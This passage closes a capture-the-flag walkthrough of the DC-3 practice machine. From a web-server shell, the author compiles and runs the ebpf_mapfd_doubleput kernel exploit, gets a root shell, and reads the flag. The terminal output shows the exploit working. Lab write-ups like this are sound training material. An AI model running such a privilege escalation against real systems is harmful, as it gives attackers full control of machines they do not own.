-rw-r----- 1 www-data www-data  255 Apr 26  2016 suidhelper.c
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x compile.sh
chmod +x compile.sh
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./compile.sh
./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$

We make the exploit file executable and run the exploit

www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ chmod +x doubleput
chmod +x doubleput
www-data@DC-3:/tmp/ebpf_mapfd_doubleput_exploit$ ./doubleput
./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# 

We got root! If we change directory to root we find the one and only flag

root@DC-3:/tmp/ebpf_mapfd_doubleput_exploit# cd /root
cd /root
root@DC-3:/root# ls -la
ls -la
total 32
drwx------  2 root root 4096 Mar 26  2019 .
drwxr-xr-x 22 root root 4096 Mar 23  2019 ..
-rw-------  1 root root   67 Mar 26  2019 .bash_history
-rw-r--r--  1 root root 3106 Oct 23  2015 .bashrc
-rw-------  1 root root   71 Mar 23  2019 .mysql_history
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
-rw-------  1 root root 2889 Mar 26  2019 .viminfo
-rw-r--r--  1 root root  604 Mar 26  2019 the-flag.txt
root@DC-3:/root# cat the-flag.txt
cat the-flag.txt
 __        __   _ _   ____                   _ _ _ _ 
 \ \      / /__| | | |  _ \  ___  _ __   ___| | | | |
  \ \ /\ / / _ \ | | | | | |/ _ \| '_ \ / _ \ | | | |
   \ V  V /  __/ | | | |_| | (_) | | | |  __/_|_|_|_|
    \_/\_/ \___|_|_| |____/ \___/|_| |_|\___(_|_|_|_)
                                                     

Congratulations are in order.  :-)

I hope you've enjoyed this challenge as I enjoyed making it.

If there are any ways that I can improve these little challenges,
please let me know.

As per usual, comments and complaints can be sent via Twitter to @DCAU7

Have a great day!!!!
root@DC-3:/root#